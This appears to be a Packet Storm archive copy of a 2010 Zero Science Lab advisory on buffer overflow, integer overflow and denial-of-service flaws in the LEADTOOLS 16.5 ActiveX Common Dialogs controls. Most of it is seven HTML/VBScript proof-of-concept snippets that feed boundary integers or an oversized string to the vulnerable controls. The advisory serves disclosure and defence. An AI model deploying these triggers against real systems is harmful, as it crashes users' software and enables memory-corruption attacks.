exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

LEADTOOLS 16.5 Active-X Common Dialogs Vulnerabilities

LEADTOOLS 16.5 Active-X Common Dialogs Vulnerabilities
Posted Sep 1, 2010
Authored by LiquidWorm | Site zeroscience.mk

LEADTOOLS version 16.5.0.2 suffers from buffer overflow, integer overflow and denial of service vulnerabilities related to Active-X Common Dialogs.

tags | exploit, denial of service, overflow, vulnerability, activex
SHA-256 | dfa7d8e1d37bb018b4f9c4c73d5ddde7edee027e7ee6c5693155ab62354e1a23
Download | Favorite | View

LEADTOOLS 16.5 Active-X Common Dialogs Vulnerabilities

Change Mirror Download

LEADTOOLS ActiveX Common Dialogs 16.5 Multiple Remote Vulnerabilities



Vendor: LEAD Technologies, Inc.
Product Web Page: http://www.leadtools.com
Affected version: 16.5.0.2


Summary: With LEADTOOLS you can control any scanner, digital camera
or capture card that has a TWAIN (32 and 64 bit) device driver.
High-level acquisition support is included for ease of use while
low-level functionality is provided for flexibility and control in
even the most demanding scanning applications.


Desc: LEADTOOLS ActiveX Common Dialogs suffers from multiple remote
vulnerabilities (IoF, BoF, DoS) as it fails to sanitize the input in
different objects included in the Common Dialogs class.


Vulnerable Objects/OCX Dialogs (Win32):

  1. ActiveX Common Dialogs (Web) --------------------> LtocxWebDlgu.dll
  2. ActiveX Common Dialogs (Effects) ----------------> LtocxEfxDlgu.dll
  3. ActiveX Common Dialogs (Image) ------------------> LtocxImgDlgu.dll
  4. ActiveX Common Dialogs (Image Effects) ----------> LtocxImgEfxDlgu.dll
  5. ActiveX Common Dialogs (Image Document)----------> LtocxImgDocDlgu.dll
  6. ActiveX Common Dialogs (Color) ------------------> LtocxClrDlgu.dll
  7. ActiveX Common Dialogs (File) -------------------> LtocxFileDlgu.dll


- RegKey Safe for Script: True
- RegKey Safe for Init: True


Tested On: Microsoft Windows XP Professional SP3 (EN)
           Windows Internet Explorer 8.0.6001.18702
           RFgen Mobile Development Studio 4.0.0.06 (Enterprise)




Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com

Zero Science Lab - http://www.zeroscience.mk

24.08.2010



Zero Science Lab Advisory ID: ZSL-2010-4961

Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4961.php




##############################################################
      Proof of Concept:
##############################################################




1. (Web, LtocxWebDlgu.dll / LTRDWU.DLL):
------------------------------------------------------

 <object classid='clsid:00165B53-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' />
 <script language='vbscript'>
 targetFile = "C:\Program Files\RFGen40\LtocxWebDlgu.dll"
 prototype  = "Property Let Bitmap As Long"
 memberName = "Bitmap"
 progid     = "LTRASTERDLGWEBLib_U.LEADRasterDlgWeb_U"
 argCount   = 1
 arg1=-1
 target.Bitmap = arg1
 </script>


2. (Effects, LtocxEfxDlgu.dll / LTRDEU.DLL):
------------------------------------------------------

 <object classid='clsid:00165B5B-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' />
 <script language='vbscript'>
 targetFile = "C:\Program Files\RFGen40\LtocxEfxDlgu.dll"
 prototype  = "Property Let Bitmap As Long"
 memberName = "Bitmap"
 progid     = "LTRASTERDLGEFXLib_U.LEADRasterDlgEfx_U"
 argCount   = 1
 arg1=-1
 target.Bitmap = arg1
 </script>


3. (Image, LtocxImgDlgu.dll / LTRDMU.DLL):
------------------------------------------------------

 <object classid='clsid:00165C7B-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' />
 <script language='vbscript'>
 targetFile = "C:\Program Files\RFGen40\LtocxImgDlgu.dll"
 prototype  = "Property Let Bitmap As Long"
 memberName = "Bitmap"
 progid     = "LTRASTERDLGIMGLib_U.LEADRasterDlgImg_U"
 argCount   = 1
 arg1=2147483647
 target.Bitmap = arg1
 </script>


4. (Image Effects, LtocxImgEfxDlgu.dll / LTRDXU.DLL):
------------------------------------------------------

 <object classid='clsid:00165B57-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' />
 <script language='vbscript'>
 targetFile = "C:\Program Files\RFGen40\LtocxImgEfxDlgu.dll"
 prototype  = "Property Let Bitmap As Long"
 memberName = "Bitmap"
 progid     = "LTRASTERDLGIMGEFXLib_U.LEADRasterDlgImgEfx_U"
 argCount   = 1
 arg1=-2147483647
 target.Bitmap = arg1
 </script>


5. (Image Document, LtocxImgDocDlgu.dll / LTRDOU.DLL):
------------------------------------------------------

 <object classid='clsid:00165B69-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' />
 <script language='vbscript'>
 targetFile = "C:\Program Files\RFGen40\LtocxImgDocDlgu.dll"
 prototype  = "Property Let Bitmap As Long"
 memberName = "Bitmap"
 progid     = "LTRASTERDLGIMGDOCLib_U.LEADRasterDlgImgDoc_U"
 argCount   = 1
 arg1=2147483647
 target.Bitmap = arg1
 </script>


6. (Color, LtocxClrDlgu.dll / LTRDRU.DLL):
------------------------------------------------------

 <object classid='clsid:00165B4F-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' />
 <script language='vbscript'>
 targetFile = "C:\Program Files\LEAD Technologies\LEADTOOLS Active-X 16.5\Bin\CDLL\Win32\LtocxClrDlgu.dll"
 prototype  = "Property Let UserPalette ( ByVal iIndex As Integer ) As Long"
 memberName = "UserPalette"
 progid     = "LTRASTERDLGCLRLib_U.LEADRasterDlgClr_U"
 argCount   = 2
 arg1=1
 arg2=-2147483647
 target.UserPalette(arg1 ) = arg2
 </script>


7. (File, LtocxFileDlgu.dll / LTRDFU.DLL):
------------------------------------------------------

 <object classid='clsid:00165C87-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' />
 <script language='vbscript'>
 targetFile = "C:\Program Files\RFGen40\LtocxFileDlgu.dll"
 prototype  = "Property Let DestinationPath As String"
 memberName = "DestinationPath"
 progid     = "LTRASTERDLGFILELib_U.LEADRasterDlgFile_U"
 argCount   = 1
 arg1=String(9236, "A")
 target.DestinationPath = arg1
 </script>



Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    0 Files
  • 10
    May 10th
    0 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close